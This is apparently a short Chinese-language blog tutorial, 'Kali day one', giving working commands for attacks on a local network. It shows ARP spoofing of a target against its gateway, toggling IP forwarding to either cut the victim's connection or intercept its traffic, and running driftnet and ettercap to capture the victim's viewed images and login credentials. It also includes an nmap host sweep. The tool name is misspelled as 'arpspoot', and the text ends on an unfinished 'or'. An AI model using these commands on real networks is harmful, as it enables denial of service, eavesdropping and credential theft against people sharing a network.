kali 第一天

  1. 局域网内的断网攻击
  2. arp欺骗,获得目标数据的浏览图片

局域网内的断网攻击

涉及命令:arpspoot
参数:
-i 网卡信息
-t 指定目标
应用实例:

arpspoot -i eth0 -t 192.168.100.8(目标IP) 192.168.100.1(网关)

注意: Linux默认情况下是不开启ip转发,所以要手动添加,ip的转发文件写在/proc/sys/net/ipv4/ip_forward 默认0(不转发)为断网,1为转发(目标用户不会断网)
echo 0 >/proc/sys/net/ipv4/ip_forward
实行断网攻击

echo 1 > /proc/sys/net/ipv4/ip_forward
目标不会断网,且数据流文件流入1文件中

在另外的窗口开启:driftnet
driftnet -i eth0  获取目标主机登录的图片,

ettercap -Tp -i eth0  获取目标主机的登录账号

arp欺骗,获得目标数据的浏览图片

nmap -sP 192.168.100.0/24   -sP后面根据自己网络填网段

或者

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 zhumeng512@qq.com

文章标题:kali 第一天

本文作者:弈少

发布时间:2019-08-12, 08:48:20

最后更新:2019-08-13, 08:55:07

原始链接:http://yoursite.com/2019/08/12/kali入门基础介绍/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏

相册